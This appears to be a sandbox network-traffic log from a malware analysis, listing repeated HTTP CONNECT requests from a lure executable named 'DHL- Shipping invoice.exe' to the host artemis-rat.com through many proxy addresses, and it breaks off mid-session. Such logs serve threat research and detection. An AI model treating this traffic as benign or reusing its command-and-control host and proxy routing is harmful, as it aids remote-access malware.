                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2005192.168.2.454271162.241.66.135329306484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.381812096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2006192.168.2.455493103.214.140.13570706484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.403382063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.453196049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.508279085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:20.519717932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:32.559123039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:44.582940102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:56.593544006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2007192.168.2.455622184.185.2.1241456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.421829939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2008192.168.2.454192148.72.210.123546156484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.433862925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.562587976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.562767029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:20.563335896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:32.562361956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:44.564941883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:56.562315941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:20.562486887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:08.562901974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2009192.168.2.452017162.214.227.68379766484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.435508966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.562557936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2010192.168.2.454346162.214.197.102464306484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.512782097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2011192.168.2.454307138.121.161.8280976484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.512996912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.640651941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.750044107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:20.750608921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:32.825052977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:44.952924013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:56.952892065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:20.952896118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:08.991463900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2012192.168.2.451959198.12.255.193637616484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.532648087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.640702963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.750067949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:20.750539064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:32.825074911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:44.955440998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:56.954955101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:20.952971935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:39:08.991796017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2013192.168.2.455620125.122.26.24210806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.532890081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2014192.168.2.455625104.244.75.78315346484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.532926083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2015192.168.2.455614124.163.236.5473026484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.533076048 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:09.453026056 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:10.950356960 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:13.750181913 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:14.179025888 CET90INHTTP/1.1 200 OK
                            Content-Type: application/json
                            Connection: close
                            Content-Length: 55


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2016192.168.2.455626142.4.123.41806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.533198118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2017192.168.2.451969162.214.197.102587406484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.533404112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.640861034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.750088930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:20.750564098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:32.825076103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:44.955445051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2018192.168.2.454437199.102.104.7041456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.533791065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2019192.168.2.454383146.59.18.24699866484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.543709993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.640861034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.750088930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:20.750564098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:32.825110912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2020192.168.2.451985184.170.245.14841456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.600797892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2021192.168.2.45562460.188.102.225180806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.627774000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2022192.168.2.45442892.205.61.38486646484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.634970903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.765649080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:14.859606981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:20.859637976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2023192.168.2.4555641.15.62.1256786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.672385931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2024192.168.2.45449223.122.184.988886484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.689093113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2025192.168.2.454468167.71.5.8380806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.729517937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:11.248095989 CET28INHTTP/1.1 400 Bad Request


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2026192.168.2.45563191.201.240.8456786484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.734797001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2027192.168.2.45563034.95.243.12280816484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.734934092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2028192.168.2.455629190.113.12.7533896484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.736211061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2029192.168.2.45557345.238.57.136296484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.739291906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            2030192.168.2.454604161.97.163.52285936484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:08.765979052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.359504938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
